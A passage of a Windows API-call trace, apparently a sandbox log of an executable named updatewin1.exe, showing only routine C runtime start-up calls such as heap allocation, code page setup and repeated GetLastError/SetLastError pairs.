hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0128.930] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x8, Size=0x800) returned 0x1d809f0 [0128.931] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0128.931] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0128.931] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0128.931] SetHandleCount (uNumber=0x20) returned 0x20 [0128.931] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" " [0128.931] GetEnvironmentStringsW () returned 0x2b4e70* [0128.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0128.931] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x565) returned 0x1d811f8 [0128.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x1d811f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0128.931] FreeEnvironmentStringsW (penv=0x2b4e70) returned 1 [0128.931] GetLastError () returned 0x0 [0128.931] SetLastError (dwErrCode=0x0) [0128.931] GetLastError () returned 0x0 [0128.931] SetLastError (dwErrCode=0x0) [0128.932] GetLastError () returned 0x0 [0128.932] SetLastError (dwErrCode=0x0) [0128.932] GetACP () returned 0x4e4 [0128.932] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x220) returned 0x1d81768 [0128.932] GetLastError () returned 0x0 [0128.932] SetLastError (dwErrCode=0x0) [0128.932] IsValidCodePage (CodePage=0x4e4) returned 1 [0128.932] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0128.932] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0128.932] GetLastError () returned 0x0 [0128.932] SetLastError (dwErrCode=0x0) [0128.932] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0128.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0128.932] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0128.932] GetLastError () returned 0x0 [0128.932] SetLastError (dwErrCode=0x0) [0128.932] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0128.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.932] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ") returned 256 [0128.932] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0128.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0128.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿLE°\x0c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0128.933] GetLastError () returned 0x0 [0128.933] SetLastError (dwErrCode=0x0) [0128.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0128.933] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ") returned 256 [0128.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0128.933] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿة㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0128.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿLE°\x0c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0128.933] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe")) returned 0x5f [0128.933] GetLastError () returned 0x0 [0128.933] SetLastError (dwErrCode=0x0) [0128.933] GetLastError () returned 0x0 [0128.933] SetLastError (dwErrCode=0x0) [0128.933] GetLastError () returned 0x0 [0128.933] SetLastError (dwErrCode=0x0) [0128.933] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.934] SetLastError (dwErrCode=0x0) [0128.934] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.935] GetLastError () returned 0x0 [0128.935] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.936] SetLastError (dwErrCode=0x0) [0128.936] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.937] SetLastError (dwErrCode=0x0) [0128.937] GetLastError () returned 0x0 [0128.938] SetLastError (dwErrCode=0x0) [0128.938] GetLastError () returned 0x0 [0128.938] SetLastError (dwErrCode=0x0) [0128.938] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.939] SetLastError (dwErrCode=0x0) [0128.939] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.940] GetLastError () returned 0x0 [0128.940] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.941] SetLastError (dwErrCode=0x0) [0128.941] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.942] SetLastError (dwErrCode=0x0) [0128.942] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.943] SetLastError (dwErrCode=0x0) [0128.943] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] RtlAllocateHeap (HeapHandle=0x1d80000, Flags=0x0, Size=0x68) returned 0x1d81990 [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.944] SetLastError (dwErrCode=0x0) [0128.944] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.945] SetLastError (dwErrCode=0x0) [0128.945] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) [0128.946] GetLastError () returned 0x0 [0128.946] SetLastError (dwErrCode=0x0) 